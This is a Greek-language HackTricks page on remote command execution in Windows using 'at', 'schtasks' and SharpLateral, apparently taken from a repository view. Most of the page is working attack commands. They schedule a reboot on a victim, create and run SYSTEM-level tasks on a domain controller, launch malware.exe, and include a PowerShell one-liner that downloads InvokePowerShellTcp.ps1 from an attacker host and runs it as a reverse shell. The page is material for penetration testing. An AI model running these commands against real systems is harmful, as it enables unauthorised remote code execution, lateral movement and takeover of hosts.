hacktricks/windows-hardening/ntlm/atexec.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

4.6 KiB
Raw Blame History

AtExec / SchtasksExec

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Πώς λειτουργεί

Το At επιτρέπει τον προγραμματισμό εργασιών σε υπολογιστές όπου γνωρίζετε το όνομα χρήστη/(κωδικό πρόσβασης/Hash). Έτσι, μπορείτε να το χρησιμοποιήσετε για να εκτελέσετε εντολές σε άλλους υπολογιστές και να λάβετε την έξοδο.

At \\victim 11:00:00PM shutdown -r

Χρησιμοποιώντας το schtasks πρέπει πρώτα να δημιουργήσετε την εργασία και στη συνέχεια να την καλέσετε:

{% code overflow="wrap" %}

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Μπορείτε επίσης να χρησιμοποιήσετε το SharpLateral:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

Περισσότερες πληροφορίες σχετικά με την χρήση του schtasks με ασημένια εισιτήρια εδώ.

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: